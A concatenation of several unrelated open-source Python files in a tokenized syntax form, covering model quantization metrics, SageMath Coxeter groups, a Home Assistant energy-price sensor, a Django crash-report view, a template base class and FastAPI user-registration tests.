cursor.fetchall()<block_start>team_id=result["team_id"]<line_sep>team_name=result["team_name"]<line_sep>raw_score=int(result["score"])<line_sep>sla_percentage=_get_uptime_for_team(team_id cursor)<line_sep>scores_[team_id]={"team_name":team_name "raw_score":raw_score "sla":int(sla_percentage) "score":raw_score<times>(sla_percentage/100.)}<block_end><return>json.dumps({"scores":scores_})<block_end>
# Copyright (C) 2020-2021 Intel Corporation # SPDX-License-Identifier: Apache-2.0 <import_from_stmt>copy deepcopy<import_from_stmt>functools partial<import_stmt>numpy<as>np<import_stmt>scipy<import_from_stmt>addict Dict<import_from_stmt>....algorithms.quantization utils<as>eu<import_from_stmt>....engines.ac_engine ACEngine<import_from_stmt>....graph.model_utils get_nodes_by_type<import_from_stmt>....graph.node_utils get_all_node_outputs<import_from_stmt>....graph.utils find_operation_matches<import_from_stmt>....samplers.creator create_sampler<line_sep>SPECIAL_METRICS=['cmc' 'reid_map' 'pairwise_accuracy_subsets' 'pairwise_accuracy' 'normalized_embedding_accuracy' 'face_recognition_tafa_pair_metric' 'localization_recall' 'coco_orig_keypoints_precision' 'coco_orig_segm_precision' 'coco_orig_keypoints_precision']<line_sep>METRICS_CONFIGS={'sigmoid_recom_loss':{'metrics':'log_loss' 'postprocessing':'sigmoid_normalize_recommendation'} 'coco_precision':{'metrics':'coco_precision'} 'coco_segm_precision':{'metrics':'coco_segm_precision'}}<line_sep>METRIC2PROXY_METRIC={'hit_ratio':{'persample':'sigmoid_recom_loss' 'ranking':'sigmoid_recom_loss'} 'ndcg':{'persample':'sigmoid_recom_loss' 'ranking':'sigmoid_recom_loss'} 'coco_orig_precision':{'persample':'coco_precision'} 'coco_orig_keypoints_precision':{'persample':'coco_precision'} 'coco_orig_segm_precision':{'persample':'coco_segm_precision'}}<def_stmt>create_metric_config engine algo_config:Dict force_logit_comparison=<false> logit_distance_type='cosine'<arrow>Dict<block_start><def_stmt>create_metric_params metric_name<block_start>engine_metrics_attributes=engine.get_metrics_attributes()<if_stmt>metric_name<not><in>engine_metrics_attributes<block_start>RuntimeError('Couldn\'t create metric parameters. '<concat>'Metric {} not registered in the engine.'.format(metric_name))<block_end>params=Dict()<line_sep>params.name=metric_name<line_sep>params.type=engine_metrics_attributes[metric_name]['type']<line_sep>params.is_special=(params.type<in>SPECIAL_METRICS)<or>force_logit_comparison<if_stmt>engine_metrics_attributes[metric_name]['direction']<eq>'higher-better'<block_start>params.comparator=(<lambda>a:a)<block_end><elif_stmt>engine_metrics_attributes[metric_name]['direction']<eq>'higher-worse'<block_start>params.comparator=(<lambda>a:-a)<block_end><else_stmt><block_start><raise>ValueError('Unexpected {} metric direction value.'.format(metric_name))<block_end>params.sort_fn=partial(sort_by_logit_distance distance=logit_distance_type)<if>params.is_special<else>partial(sort_by_metric_difference comp_fn=params.comparator)<line_sep><return>params<block_end><def_stmt>metric_to_proxy_map metrics<block_start>"""Determines which metrics need proxy metrics and creates metrics to proxy metrics map. :param metrics: optimizable metrics names :returns a dictionary of metrics to proxy metrics mapping {metric_name: 'persample': proxy_name, 'ranking': proxy_name} a list of proxy metrics names to register """<def_stmt>update_proxy_list proxy_metric_name<block_start>"""Updates a list of proxy metrics names to register. :return a proxy metric name in accordance with the engine naming """<line_sep>proxy_config=METRICS_CONFIGS.get(proxy_metric_name {})<line_sep>metric_config=proxy_config.get('metrics')<line_sep>postprocessing_config=proxy_config.get('postprocessing')<if_stmt>metric_config<or>postprocessing_config<block_start>to_register.add(proxy_metric_name)<block_end><return>metric_name_from_config(metric_config)<block_end>match_names_config=Dict({metric_name:{}<for>metric_name metrics})<line_sep>to_register=set()<for_stmt>metric_name,metric_type metrics<block_start><if_stmt>metric_type<in>METRIC2PROXY_METRIC<block_start>persample_metric_name=METRIC2PROXY_METRIC[metric_type].get('persample')<line_sep>persample_proxy_metric_name=update_proxy_list(persample_metric_name)<if_stmt>persample_proxy_metric_name<block_start>match_names_config[metric_name].persample=persample_proxy_metric_name<block_end>ranking_metric_name=METRIC2PROXY_METRIC[metric_type].get('ranking')<line_sep>ranking_proxy_metric_name=update_proxy_list(ranking_metric_name)<if_stmt>ranking_proxy_metric_name<block_start>match_names_config[metric_name].ranking=ranking_proxy_metric_name<block_end><block_end><block_end><return>match_names_config list(to_register)<block_end>metrics_attributes=engine.get_metrics_attributes()<line_sep># configure which metrics to optimize <if_stmt>algo_config.metrics<block_start>metrics_names=[]<for_stmt>metric algo_config.metrics<block_start>metric_type=metric.type<if>metric.type<else>metric.name<line_sep>metrics_names.append((metric.name metric_type))<block_end><block_end><else_stmt><block_start>metrics_names=[(metric_name metric_attr.get('type' metric_name))<for>metric_name,metric_attr metrics_attributes.items()]<block_end># register proxy metrics metrics_to_proxy_map,metrics_to_register=metric_to_proxy_map(metrics_names)<line_sep>register_metrics(engine metrics_to_register)<line_sep>metrics_config=Dict()<for_stmt>metric,_ metrics_names<block_start>persample_name=metrics_to_proxy_map[metric].get('persample' metric)<line_sep>ranking_name=metrics_to_proxy_map[metric].get('ranking' metric)<line_sep>metrics_config[metric].persample=create_metric_params(persample_name)<line_sep>metrics_config[metric].ranking=create_metric_params(ranking_name)<line_sep>metrics_config[metric].update(create_metric_params(metric))<block_end><return>metrics_config<block_end><def_stmt>metric_name_from_config metric_config<block_start><if_stmt>isinstance(metric_config str)<block_start><return>metric_config<block_end><if_stmt>isinstance(metric_config dict)<block_start><return>metric_config.get('name' metric_config['type'])<block_end><return><none><block_end><def_stmt>register_metrics engine metrics_names:list<block_start>"""Registers metrics and postprocessing in the engine. :param engine: an engine in which metrics will be registered :param metrics_names: a list of metrics names """<line_sep>registered_metrics=engine.get_metrics_attributes()<for_stmt>metric metrics_names<block_start><if_stmt>metric<not><in>METRICS_CONFIGS<block_start><raise>ValueError('Cannot register metric. Unsupported name {}.'.format(metric))<block_end>proxy_config=METRICS_CONFIGS.get(metric {})<if_stmt>'metrics'<in>proxy_config<block_start>metric_config=proxy_config['metrics']<if_stmt>metric_name_from_config(metric_config)<not><in>registered_metrics<block_start>register_metric(engine metric_config)<block_end><block_end><if_stmt>'postprocessing'<in>proxy_config<block_start>postprocessing_config=proxy_config['postprocessing']<line_sep>register_postprocessing(engine postprocessing_config)<block_end><block_end><block_end><def_stmt>sort_by_logit_distance u v reverse=<false> distance='cosine'<block_start><if_stmt>len(u)<ne>len(v)<block_start><raise>RuntimeError('Cannot compare samples. '<concat>'Lists of per-sample metric results should be the same length.')<block_end>kd_distance=<lambda>u v:scipy.stats.entropy(scipy.special.softmax(u) scipy.special.softmax(v))<line_sep>mse_distance=<lambda>u v:np.mean((u-v)<power>2)<line_sep>distance_function={'cosine':scipy.spatial.distance.cosine 'kd':kd_distance 'mse':mse_distance }<line_sep>distance_between_samples=np.array([distance_function[distance](ui.flatten() vi.flatten())<for>ui,vi zip(u v)])<line_sep>sorted_arr=np.argsort(distance_between_samples)<if_stmt>reverse<block_start>sorted_arr=np.flip(sorted_arr)<block_end><return>sorted_arr<block_end><def_stmt>sort_by_metric_difference u v comp_fn=<lambda>a:a reverse=<false><block_start><if_stmt>len(u)<ne>len(v)<block_start><raise>RuntimeError('Cannot compare samples. '<concat>'Lists of per-sample metric results should be the same length.')<block_end>u=np.asarray(u)<line_sep>v=np.asarray(v)<line_sep>sorted_arr=np.argsort(comp_fn(u-v))<if_stmt>reverse<block_start>sorted_arr=np.flip(sorted_arr)<block_end><return>sorted_arr<block_end><def_stmt>register_metric engine metric_config<block_start><if_stmt>isinstance(engine ACEngine)<block_start>engine.add_metric(metric_config)<block_end><else_stmt><block_start><raise>NotImplementedError('{} engine cannot register new metrics.'.format(type(engine).__name__))<block_end><block_end><def_stmt>register_postprocessing engine postprocessing_config<block_start><if_stmt>isinstance(engine ACEngine)<block_start>engine.add_postprocessing(postprocessing_config)<block_end><else_stmt><block_start><raise>NotImplementedError('{} engine cannot register new postprocessing.'.format(type(engine).__name__))<block_end><block_end><def_stmt>is_preset_performance config:Dict<block_start><if_stmt>config.weights.mode<eq>'symmetric'<and>config.activations.mode<eq>'symmetric'<block_start><return><true><block_end><if_stmt>config.weights.mode<eq>'asymmetric'<or>config.activations.mode<eq>'asymmetric'<block_start><return><false><block_end><if_stmt>config.preset<eq>'performance'<block_start><return><true><block_end><return><false><block_end><def_stmt>get_mixed_preset_config config:Dict<block_start>config=deepcopy(config)<line_sep>config.update(preset='mixed')<if_stmt>config.activations.mode<block_start>config.activations.mode='asymmetric'<block_end><if_stmt>config.weights.mode<block_start>config.weights.mode='symmetric'<block_end><return>config<block_end><def_stmt>get_num_of_quantized_ops model quantizable_operations<block_start>quantized_ops=set()<line_sep>nodes_to_see=[]<for_stmt>fq_node get_nodes_by_type(model ['FakeQuantize'])<block_start>nodes_to_see.extend(get_all_node_outputs(fq_node))<while_stmt>nodes_to_see<block_start>child=nodes_to_see.pop()<if_stmt>find_operation_matches(quantizable_operations child)<block_start>quantized_ops.add(child)<line_sep><continue><block_end>nodes_to_see.extend(get_all_node_outputs(child))<block_end><block_end><return>len(quantized_ops)<block_end><def_stmt>evaluate_model model engine dataset_size subset_indices=<none> print_progress=<true> metrics_config=<none> per_sample_subset_indices=<none> output_node_name=<none> stats_layout=<none> <block_start>"""Evaluates the model and processes metrics values :param model: model to evaluate :param subset_indices: image indices to evaluate on. If None evaluate on whole dataset :param per_sample_subset_indices: image indices for which to return per-sample metrics. If None for all predicted images :param print_progress: Whether to print inference progress :returns a dictionary of predicted metrics {metric_name: value} a dictionary of per-sample metrics values {metric_name: [values]} """<line_sep>engine.set_model(model)<line_sep>eu.select_evaluation_dataset(engine)<if_stmt><not>subset_indices<block_start>subset_indices=range(dataset_size)<block_end>index_sampler=create_sampler(engine samples=subset_indices)<line_sep>(metrics_per_sample metrics),raw_output=engine.predict(stats_layout=stats_layout sampler=index_sampler metric_per_sample=<true> print_progress=print_progress)<line_sep>raw_output=process_raw_output(raw_output output_node_name)<line_sep>metrics_per_sample=process_per_sample_metrics(metrics_per_sample metrics_config per_sample_subset_indices raw_output=raw_output)<line_sep>metrics=dict((name value)<for>name,value metrics.items()<if>name<in>metrics_config)<line_sep>eu.reset_dataset_to_default(engine)<line_sep><return>metrics metrics_per_sample<block_end><def_stmt>process_raw_output output output_node_name<block_start><if_stmt><not>output<block_start><return>[]<block_end><return>output[output_node_name]['output_logits']<block_end><def_stmt>process_per_sample_metrics metrics_per_sample metrics_config indices=<none> raw_output=<none><block_start>"""Creates a dictionary of per-sample metrics values {metric_name: [values]} :param metrics_per_sample: list of per-sample metrics :param indices: indices of samples to be considered. All if None :param raw_output: raw output from the model :return processed dictionary """<line_sep>metrics_to_keep={config.persample.name:config.persample<for>config metrics_config.values()}<if_stmt><not>metrics_to_keep<block_start><return>{}<block_end>processed_metrics_per_sample=dict((name [])<for>name metrics_to_keep)<for_stmt>metric_name,metric_params metrics_to_keep.items()<block_start><if_stmt>metric_params.is_special<block_start>processed_metrics_per_sample[metric_name]=raw_output<block_end><block_end><for_stmt>value metrics_per_sample<block_start><if_stmt>value['metric_name']<in>metrics_to_keep<block_start><if_stmt>metrics_to_keep[value['metric_name']].is_special<block_start><continue><block_end><if_stmt>value['result']<is><not><none><block_start>result_value=np.nanmean(value['result'])<block_end><else_stmt><block_start>result_value=<none><block_end>processed_metrics_per_sample[value['metric_name']].append(result_value)<block_end><block_end># check that all metrics have equal number of samples <if_stmt><not>len({len(value)<for>value processed_metrics_per_sample.values()})<eq>1<block_start><raise>RuntimeError('Inconsistent number of per-sample metric values')<block_end><if_stmt>indices<block_start><for_stmt>name,values processed_metrics_per_sample.items()<block_start>processed_metrics_per_sample[name]=[values[i]<for>i indices]<block_end><block_end><return>processed_metrics_per_sample<block_end>
""" Coxeter Groups """<line_sep>#***************************************************************************** # Copyright (C) 2010 <NAME> <nthiery at users.sf.net> # # Distributed under the terms of the GNU General Public License (GPL) # # http://www.gnu.org/licenses/ #***************************************************************************** <import_from_stmt>sage.combinat.root_system.weyl_group WeylGroup<import_from_stmt>sage.combinat.root_system.reflection_group_real ReflectionGroup<import_from_stmt>sage.combinat.root_system.cartan_type CartanType<def_stmt>CoxeterGroup data implementation="reflection" base_ring=<none> index_set=<none><block_start>""" Return an implementation of the Coxeter group given by ``data``. INPUT: - ``data`` -- a Cartan type (or coercible into; see :class:`CartanType`) or a Coxeter matrix or graph - ``implementation`` -- (default: ``'reflection'``) can be one of the following: * ``'permutation'`` - as a permutation representation * ``'matrix'`` - as a Weyl group (as a matrix group acting on the root space); if this is not implemented, this uses the "reflection" implementation * ``'coxeter3'`` - using the coxeter3 package * ``'reflection'`` - as elements in the reflection representation; see :class:`~sage.groups.matrix_gps.coxeter_groups.CoxeterMatrixGroup` - ``base_ring`` -- (optional) the base ring for the ``'reflection'`` implementation - ``index_set`` -- (optional) the index set for the ``'reflection'`` implementation EXAMPLES: Now assume that ``data`` represents a Cartan type. If ``implementation`` is not specified, the reflection representation is returned:: sage: W = CoxeterGroup(["A",2]) sage: W Finite Coxeter group over Integer Ring with Coxeter matrix: [1 3] [3 1] sage: W = CoxeterGroup(["A",3,1]); W Coxeter group over Integer Ring with Coxeter matrix: [1 3 2 3] [3 1 3 2] [2 3 1 3] [3 2 3 1] sage: W = CoxeterGroup(['H',3]); W Finite Coxeter group over Number Field in a with defining polynomial x^2 - 5 with a = 2.236067977499790? with Coxeter matrix: [1 3 2] [3 1 5] [2 5 1] We now use the ``implementation`` option:: sage: W = CoxeterGroup(["A",2], implementation = "permutation") # optional - gap3 sage: W # optional - gap3 Permutation Group with generators [(1,4)(2,3)(5,6), (1,3)(2,5)(4,6)] sage: W.category() # optional - gap3 Join of Category of finite enumerated permutation groups and Category of finite weyl groups and Category of well generated finite irreducible complex reflection groups sage: W = CoxeterGroup(["A",2], implementation="matrix") sage: W Weyl Group of type ['A', 2] (as a matrix group acting on the ambient space) sage: W = CoxeterGroup(["H",3], implementation="matrix") sage: W Finite Coxeter group over Number Field in a with defining polynomial x^2 - 5 with a = 2.236067977499790? with Coxeter matrix: [1 3 2] [3 1 5] [2 5 1] sage: W = CoxeterGroup(["H",3], implementation="reflection") sage: W Finite Coxeter group over Number Field in a with defining polynomial x^2 - 5 with a = 2.236067977499790? with Coxeter matrix: [1 3 2] [3 1 5] [2 5 1] sage: W = CoxeterGroup(["A",4,1], implementation="permutation") Traceback (most recent call last): ... ValueError: the type must be finite sage: W = CoxeterGroup(["A",4], implementation="chevie"); W # optional - gap3 Irreducible real reflection group of rank 4 and type A4 We use the different options for the "reflection" implementation:: sage: W = CoxeterGroup(["H",3], implementation="reflection", base_ring=RR) sage: W Finite Coxeter group over Real Field with 53 bits of precision with Coxeter matrix: [1 3 2] [3 1 5] [2 5 1] sage: W = CoxeterGroup([[1,10],[10,1]], implementation="reflection", index_set=['a','b'], base_ring=SR) sage: W Finite Coxeter group over Symbolic Ring with Coxeter matrix: [ 1 10] [10 1] TESTS:: sage: W = groups.misc.CoxeterGroup(["H",3]) """<if_stmt>implementation<not><in>["permutation" "matrix" "coxeter3" "reflection" "chevie" <none>]<block_start><raise>ValueError("invalid type implementation")<block_end><import_from_stmt>sage.groups.matrix_gps.coxeter_group CoxeterMatrixGroup<try_stmt><block_start>cartan_type=CartanType(data)<block_end><except_stmt>(TypeError ValueError)# If it is not a Cartan type, try to see if we can represent it as a matrix group <block_start><return>CoxeterMatrixGroup(data base_ring index_set)<block_end><if_stmt>implementation<is><none><block_start>implementation="matrix"<block_end><if_stmt>implementation<eq>"reflection"<block_start><return>CoxeterMatrixGroup(cartan_type base_ring index_set)<block_end><if_stmt>implementation<eq>"coxeter3"<block_start><try_stmt><block_start><import_from_stmt>sage.libs.coxeter3.coxeter_group CoxeterGroup<block_end><except_stmt>ImportError<block_start><raise>RuntimeError("coxeter3 must be installed")<block_end><else_stmt><block_start><return>CoxeterGroup(cartan_type)<block_end><block_end><if_stmt>implementation<eq>"permutation"<block_start><if_stmt><not>cartan_type.is_finite()<block_start><raise>ValueError("the type must be finite")<block_end><if_stmt>cartan_type.is_crystallographic()<block_start><return>WeylGroup(cartan_type implementation="permutation")<block_end><return>ReflectionGroup(cartan_type index_set=index_set)<block_end><elif_stmt>implementation<eq>"matrix"<block_start><if_stmt>cartan_type.is_crystallographic()<block_start><return>WeylGroup(cartan_type)<block_end><return>CoxeterMatrixGroup(cartan_type base_ring index_set)<block_end><elif_stmt>implementation<eq>"chevie"<block_start><return>ReflectionGroup(cartan_type index_set=index_set)<block_end><raise>NotImplementedError("Coxeter group of type {} as {} group not implemented".format(cartan_type implementation))<block_end><import_from_stmt>sage.misc.persist register_unpickle_override<line_sep>register_unpickle_override('sage.combinat.root_system.coxeter_group' 'CoxeterGroupAsPermutationGroup' ReflectionGroup)<line_sep>
"""Support for Flick Electric Pricing data."""<import_from_stmt>datetime timedelta<import_stmt>logging<import_stmt>async_timeout<import_from_stmt>pyflick FlickAPI FlickPrice<import_from_stmt>homeassistant.components.sensor SensorEntity<import_from_stmt>homeassistant.config_entries ConfigEntry<import_from_stmt>homeassistant.const ATTR_ATTRIBUTION ATTR_FRIENDLY_NAME<import_from_stmt>homeassistant.core HomeAssistant<import_from_stmt>homeassistant.util.dt utcnow<import_from_stmt>.const ATTR_COMPONENTS ATTR_END_AT ATTR_START_AT DOMAIN<line_sep>_LOGGER=logging.getLogger(__name__)<line_sep>_AUTH_URL="https://api.flick.energy/identity/oauth/token"<line_sep>_RESOURCE="https://api.flick.energy/customer/mobile_provider/price"<line_sep>SCAN_INTERVAL=timedelta(minutes=5)<line_sep>ATTRIBUTION="Data provided by Flick Electric"<line_sep>FRIENDLY_NAME="Flick Power Price"<line_sep>UNIT_NAME="cents"<async_keyword><def_stmt>async_setup_entry hass:HomeAssistant entry:ConfigEntry async_add_entities<block_start>"""Flick Sensor Setup."""<line_sep>api:FlickAPI=hass.data[DOMAIN][entry.entry_id]<line_sep>async_add_entities([FlickPricingSensor(api)] <true>)<block_end><class_stmt>FlickPricingSensor(SensorEntity)<block_start>"""Entity object for Flick Electric sensor."""<line_sep>_attr_native_unit_of_measurement=UNIT_NAME<def_stmt>__init__ self api:FlickAPI<arrow><none><block_start>"""Entity object for Flick Electric sensor."""<line_sep>self._api:FlickAPI=api<line_sep>self._price:FlickPrice=<none><line_sep>self._attributes={ATTR_ATTRIBUTION:ATTRIBUTION ATTR_FRIENDLY_NAME:FRIENDLY_NAME }<block_end>@property<def_stmt>name self<block_start>"""Return the name of the sensor."""<line_sep><return>FRIENDLY_NAME<block_end>@property<def_stmt>native_value self<block_start>"""Return the state of the sensor."""<line_sep><return>self._price.price<block_end>@property<def_stmt>extra_state_attributes self<block_start>"""Return the state attributes."""<line_sep><return>self._attributes<block_end><async_keyword><def_stmt>async_update self<block_start>"""Get the Flick Pricing data from the web service."""<if_stmt>self._price<and>self._price.end_at<ge>utcnow()<block_start><return><block_end># Power price data is still valid <async_keyword><with_stmt>async_timeout.timeout(60)<block_start>self._price=<await>self._api.getPricing()<block_end>self._attributes[ATTR_START_AT]=self._price.start_at<line_sep>self._attributes[ATTR_END_AT]=self._price.end_at<for_stmt>component self._price.components<block_start><if_stmt>component.charge_setter<not><in>ATTR_COMPONENTS<block_start>_LOGGER.warning("Found unknown component: %s" component.charge_setter)<line_sep><continue><block_end>self._attributes[component.charge_setter]=float(component.value)<block_end><block_end><block_end>
# coding: utf8 """ This software is licensed under the Apache 2 license, quoted below. Copyright 2014 Crystalnix Limited Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """<import_stmt>json<import_from_stmt>django.core.exceptions ObjectDoesNotExist<import_from_stmt>django.core.urlresolvers reverse_lazy<import_from_stmt>django.views.generic FormView<import_from_stmt>django.views.decorators.csrf csrf_exempt<import_from_stmt>django.http HttpResponse HttpResponseBadRequest<import_from_stmt>crash.forms CrashFrom CrashDescriptionForm<import_from_stmt>crash.models Crash<import_from_stmt>omaha_server.utils get_client_ip<class_stmt>CrashFormView(FormView)<block_start>http_method_names=('post' )<line_sep>form_class=CrashFrom<line_sep>@csrf_exempt<def_stmt>dispatch self *args **kwargs<block_start><return>super(CrashFormView self).dispatch(*args **kwargs)<block_end><def_stmt>form_valid self form<block_start>meta=self.request.POST.dict()<line_sep>meta.pop("appid" <none>)<line_sep>meta.pop("userid" <none>)<line_sep>obj=form.save(commit=<false>)<if_stmt>meta<block_start>obj.meta=meta<block_end>obj.ip=get_client_ip(self.request)<line_sep>obj.save()<line_sep><return>HttpResponse(obj.pk status=200)<block_end><def_stmt>form_invalid self form<block_start><return>HttpResponse(json.dumps(form.errors) status=400 content_type='application/json')<block_end><block_end><class_stmt>CrashDescriptionFormView(FormView)<block_start>form_class=CrashDescriptionForm<line_sep>template_name='crash/crash_description.html'<line_sep>success_url=reverse_lazy('crash_description_submitted')<def_stmt>dispatch self request *args **kwargs# verify crash_id refers to valid crash object <block_start><try_stmt><block_start>self.crash=Crash.objects.select_related('crash_description').get(pk=self.kwargs.get('pk'))<block_end><except_stmt>Crash.DoesNotExist<block_start><return>HttpResponseBadRequest('no such crash')<block_end># verify there is no crash description for that object yet <try_stmt><block_start>desc=self.crash.crash_description<line_sep><return>HttpResponseBadRequest('already reported as \"%s\"'%desc.summary)<block_end><except_stmt>ObjectDoesNotExist<block_start><pass><block_end><return>super(CrashDescriptionFormView self).dispatch(request *args **kwargs)<block_end><def_stmt>get_initial self<block_start>data=super(CrashDescriptionFormView self).get_initial()<line_sep>data['description']=self.request.GET.get('comment')<line_sep><return>data<block_end><def_stmt>form_valid self form<block_start>obj=form.save(commit=<false>)<line_sep>obj.crash=self.crash<line_sep>obj.save()<line_sep><return>super(CrashDescriptionFormView self).form_valid(form)<block_end><block_end>
# Copyright 2007 The Spitfire Authors. All Rights Reserved. # # Use of this source code is governed by a BSD-style # license that can be found in the LICENSE file. # an 'abstract' base class for a template, seems like a good idea for now <import_stmt>cStringIO<as>StringIO<import_from_stmt>spitfire runtime<import_from_stmt>spitfire.runtime baked<import_from_stmt>spitfire.runtime filters<import_from_stmt>spitfire.runtime udn<try_stmt><block_start><import_from_stmt>spitfire.runtime _template# pylint: disable=g-import-not-at-top <block_end><except_stmt>ImportError<block_start>_template=<none><block_end># NOTE: in some instances, this is faster than using cStringIO # this is slightly counter intuitive and probably means there is more here than # meets the eye. <class_stmt>BufferIO(list)<block_start>write=list.append<def_stmt>getvalue self<block_start><return>''.join(self)<block_end><block_end><class_stmt>_BaseSpitfireTemplate(object)# filter_function checks if the value should be filtered. If it is a # SanitizedPlaceholder or the placeholder_function has a skip_filter # annotation, there is no need to filter. Otherwise, call # self._filter_function. <block_start><def_stmt>filter_function self value placeholder_function=<none><block_start>"""Checks if the value should be filtered. If it is a SanitizedPlaceholder or the placeholder_function has a skip_filter annotation, there is no need to filter. Otherwise, call self._filter_function. Args: value: The value that may need to be filtered. placeholder_function: If present and annotated, do not filter. Returns: value, filtered if necessary. """<if_stmt>isinstance(value baked.SanitizedPlaceholder)<block_start><return>value<block_end><elif_stmt>(placeholder_function<is><not><none><and>getattr(placeholder_function 'skip_filter' <false>))<block_start><return>value<block_end><else_stmt><block_start><return>self._filter_function(value)<block_end><block_end><block_end><def_stmt>get_spitfire_template_class prefer_c_extension=<true><block_start>"""Returns an appropriate SpitfireTemplate class. Args: prefer_c_extension: If set True and _template loaded properly, use the C extension's baseclass implementation. Returns: A SpitfireTemplate class with an appropriate base class. """<if_stmt>prefer_c_extension<and>_template<is><not><none><block_start>baseclass=_template.BaseSpitfireTemplate<block_end><else_stmt><block_start>baseclass=_BaseSpitfireTemplate<block_end><class_stmt>_SpitfireTemplate(baseclass)# store a reference to the filter function - this is tricky because of # some python stuff. filter functions look like this: # # def filter_function(template_instance, value): # # when this is assigned to a template instance, accessing this name # binds the function to the current instance. using the name # 'template_instance' to indicate that these functions aren't really # related to the template. <block_start>_filter_function=staticmethod(filters.simple_str_filter)<line_sep>repeat=<none><line_sep>placeholder_cache=<none><def_stmt>__init__ self search_list=<none> default_filter=<none> use_placeholder_cache=<false># use_placeholder_cache - cache the values returned from the # search_list? The cached values will live for the lifetime of # this object. <block_start>self.search_list=search_list<if_stmt>use_placeholder_cache<block_start>self.placeholder_cache={}<block_end><if_stmt>default_filter<is><not><none><block_start>self._filter_function=default_filter<block_end># FIXME: repeater support is not needed most of the time, just # disable it for the time being # self.repeat = spitfire.runtime.repeater.RepeatTracker() <block_end><def_stmt>get_var self name default=<none><block_start><return>udn.resolve_from_search_list(self.search_list name default)<block_end><def_stmt>has_var self name<block_start>var=self.get_var(name default=runtime.UnresolvedPlaceholder)<line_sep><return>var<is><not>runtime.UnresolvedPlaceholder<block_end>@staticmethod<def_stmt>new_buffer <block_start><return>BufferIO()<block_end><block_end><return>_SpitfireTemplate<block_end>SpitfireTemplate=get_spitfire_template_class()<def_stmt>template_method function<block_start>function.template_method=<true><line_sep>function.skip_filter=<true><line_sep><return>function<block_end>
<import_from_stmt>typing Any AsyncGenerator Dict cast<import_stmt>httpx<import_stmt>pytest<import_from_stmt>fastapi FastAPI status<import_from_stmt>fastapi_users.router ErrorCode get_register_router<import_from_stmt>tests.conftest User UserCreate<line_sep>@pytest.fixture@pytest.mark.asyncio<async_keyword><def_stmt>test_app_client get_user_manager get_test_client<arrow>AsyncGenerator[httpx.AsyncClient <none>]<block_start>register_router=get_register_router(get_user_manager User UserCreate )<line_sep>app=FastAPI()<line_sep>app.include_router(register_router)<async_keyword><for_stmt>client get_test_client(app)<block_start><yield>client<block_end><block_end>@pytest.mark.router@pytest.mark.asyncio<class_stmt>TestRegister<block_start><async_keyword><def_stmt>test_empty_body self test_app_client:httpx.AsyncClient<block_start>response=<await>test_app_client.post("/register" json={})<assert_stmt>response.status_code<eq>status.HTTP_422_UNPROCESSABLE_ENTITY<block_end><async_keyword><def_stmt>test_missing_email self test_app_client:httpx.AsyncClient<block_start>json={"password":"<PASSWORD>"}<line_sep>response=<await>test_app_client.post("/register" json=json)<assert_stmt>response.status_code<eq>status.HTTP_422_UNPROCESSABLE_ENTITY<block_end><async_keyword><def_stmt>test_missing_password self test_app_client:httpx.AsyncClient<block_start>json={"email":"<EMAIL>"}<line_sep>response=<await>test_app_client.post("/register" json=json)<assert_stmt>response.status_code<eq>status.HTTP_422_UNPROCESSABLE_ENTITY<block_end><async_keyword><def_stmt>test_wrong_email self test_app_client:httpx.AsyncClient<block_start>json={"email":"king.arthur" "password":"<PASSWORD>"}<line_sep>response=<await>test_app_client.post("/register" json=json)<assert_stmt>response.status_code<eq>status.HTTP_422_UNPROCESSABLE_ENTITY<block_end><async_keyword><def_stmt>test_invalid_password self test_app_client:httpx.AsyncClient<block_start>json={"email":"<EMAIL>" "password":"g"}<line_sep>response=<await>test_app_client.post("/register" json=json)<assert_stmt>response.status_code<eq>status.HTTP_400_BAD_REQUEST<line_sep>data=cast(Dict[str Any] response.json())<assert_stmt>data["detail"]<eq>{"code":ErrorCode.REGISTER_INVALID_PASSWORD "reason":"Password should be at least 3 characters" }<block_end>@pytest.mark.parametrize("email" ["<EMAIL>" "<EMAIL>"])<async_keyword><def_stmt>test_existing_user self email test_app_client:httpx.AsyncClient<block_start>json={"email":email "password":"<PASSWORD>"}<line_sep>response=<await>test_app_client.post("/register" json=json)<assert_stmt>response.status_code<eq>status.HTTP_400_BAD_REQUEST<line_sep>data=cast(Dict[str Any] response.json())<assert_stmt>data["detail"]<eq>ErrorCode.REGISTER_USER_ALREADY_EXISTS<block_end>@pytest.mark.parametrize("email" ["<EMAIL>" "<EMAIL>"])<async_keyword><def_stmt>test_valid_body self email test_app_client:httpx.AsyncClient<block_start>json={"email":email "password":"<PASSWORD>"}<line_sep>response=<await>test_app_client.post("/register" json=json)<assert_stmt>response.status_code<eq>status.HTTP_201_CREATED<line_sep>data=cast(Dict[str Any] response.json())<assert_stmt>"hashed_password"<not><in>data<assert_stmt>"password"<not><in>data<assert_stmt>data["id"]<is><not><none><block_end><async_keyword><def_stmt>test_valid_body_is_superuser self test_app_client:httpx.AsyncClient<block_start>json={"email":"<EMAIL>" "password":"<PASSWORD>" "is_superuser":<true> }<line_sep>response=<await>test_app_client.post("/register" json=json)<assert_stmt>response.status_code<eq>status.HTTP_201_CREATED<line_sep>data=cast(Dict[str Any] response.json())<assert_stmt>data["is_superuser"]<is><false><block_end><async_keyword><def_stmt>test_valid_body_is_active self test_app_client:httpx.AsyncClient<block_start>json={"email":"<EMAIL>" "password":"<PASSWORD>" "is_active":<false> }<line_sep>response=<await>test_app_client.post("/register" json=json)<assert_stmt>response.status_code<eq>status.HTTP_201_CREATED<line_sep>data=cast(Dict[str Any] response.json())<assert_stmt>data["is_active"]<is><true><block_end><block_end>@pytest.mark.asyncio<async_keyword><def_stmt>test_register_namespace get_user_manager<block_start>app=FastAPI()<line_sep>app.include_router(get_register_router(get_user_manager User UserCreate ))<assert_stmt>app.url_path_for("register:register")<eq>"/register"<block_end>
